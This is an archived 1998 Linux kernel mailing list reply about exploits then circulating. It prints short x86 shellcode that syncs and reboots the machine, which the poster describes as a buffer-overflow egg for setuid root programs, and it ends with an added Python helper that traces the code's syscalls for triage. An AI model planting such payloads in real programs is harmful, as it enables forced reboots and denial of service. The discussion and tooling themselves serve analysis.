Re: URGENT!

Zachary Amsden (amsdenz@aavid.com)
Wed, 15 Jul 1998 16:25:44 -0400


-----Original Message-----
From: Alex Buell <abuell@eos.EAST.HITC.COM>
To: linux-kernel@vger.rutgers.edu <linux-kernel@vger.rutgers.edu>
Cc: alex.buell@tahallah.demon.co.uk <alex.buell@tahallah.demon.co.uk>
Date: Wednesday, July 15, 1998 4:10 PM
Subject: URGENT!

>Hi guys,
>
>Has anyone read http://www.rootshell.com's July summaries lately? There
>are some security holes in Linux that *need* fixing, before
>script-kiddies start hacking our boxes to hell and back. :O(
>
>Some of them use x86 assembler - and one was particularly nasty in that
>it gave chmod 777 access to /etc/passwd - yikes!!

Yes, they all work, but they all need root access to run. Here is the
reboot code:

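reb00t:
xorl %eax,%eax          # clear %eax
movb $0x24,%al          # syscall 36: sync
int $0x80
xorl %eax,%eax
movb $0x58,%al          # syscall 88: reboot
movl $0xfee1dead,%ebx   # LINUX_REBOOT_MAGIC1
movl $672274793,%ecx    # LINUX_REBOOT_MAGIC2
movl $0x1234567,%edx    # LINUX_REBOOT_CMD_RESTART
int $0x80
xorl %eax,%eax
movb $0x01,%al          # syscall 1: exit
int $0x80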

Looking in include/asm-i386/unistd.h, it calls sync(), reboot(), then
exit(). Not dangerous; these are intended to be used as buffer
overflow eggs to plant in setuid root programs. No kernel bugs.
The one kernel "bug" listed is currently being discussed on bugtraq
and does not pose any immediate threat.

Zachary Amsden
amsden@andrew.cmu.edu
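
Added example, not part of the original message: a small triage helper that repeats the unistd.h lookup described above by tracking immediates loaded into registers and naming the syscall at each int $0x80. The function names trace_syscalls and is_restart_request are hypothetical, the syscall table is a partial subset, and only the instruction forms used in the posted listing are handled.

```python
import re

# Subset of i386 syscall numbers, as listed in include/asm-i386/unistd.h.
I386_SYSCALLS = {1: "exit", 11: "execve", 15: "chmod", 36: "sync", 88: "reboot"}
LOW8 = {"al": "eax", "bl": "ebx", "cl": "ecx", "dl": "edx"}
# reboot() arguments (linux/reboot.h): MAGIC1, MAGIC2, CMD_RESTART.
REBOOT_ARGS = (0xFEE1DEAD, 672274793, 0x01234567)
# Listing from the message (byte moves written against %al).
LISTING = """\
reb00t:
xorl %eax,%eax
movb $0x24,%al
int $0x80
xorl %eax,%eax
movb $0x58,%al
movl $0xfee1dead,%ebx
movl $672274793,%ecx
movl $0x1234567,%edx
int $0x80
xorl %eax,%eax
movb $0x01,%al
int $0x80
"""

MOV_IMM = re.compile(r"mov[bwl]?\s+\$(0x[0-9a-fA-F]+|\d+)\s*,\s*%(\w+)$")
XOR_REG = re.compile(r"xorl\s+%(\w+)\s*,\s*%(\w+)$")
INT80 = re.compile(r"int\s+\$0x80$")

def trace_syscalls(listing):
    """Return [(syscall_name, (ebx, ecx, edx))] for each int $0x80."""
    regs, calls = {}, []
    for line in (l.strip() for l in listing.splitlines()):
        if m := MOV_IMM.match(line):
            val, reg = int(m.group(1), 0), m.group(2)
            if reg in LOW8:  # byte write keeps the upper 24 bits
                old = regs.get(LOW8[reg])
                regs[LOW8[reg]] = None if old is None else (old & ~0xFF) | val
            else:
                regs[reg] = val
        elif (m := XOR_REG.match(line)) and m.group(1) == m.group(2):
            regs[m.group(1)] = 0  # xorl reg,reg zeroes the register
        elif INT80.match(line):
            name = I386_SYSCALLS.get(regs.get("eax"), "unknown")
            calls.append((name, tuple(regs.get(r) for r in ("ebx", "ecx", "edx"))))
    return calls

def is_restart_request(call):
    """True when a traced call is reboot() with the restart magic values."""
    return call[0] == "reboot" and call[1] == REBOOT_ARGS
```

Registers whose value was never set in the listing are reported as None, so the sync() call shows no known arguments.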
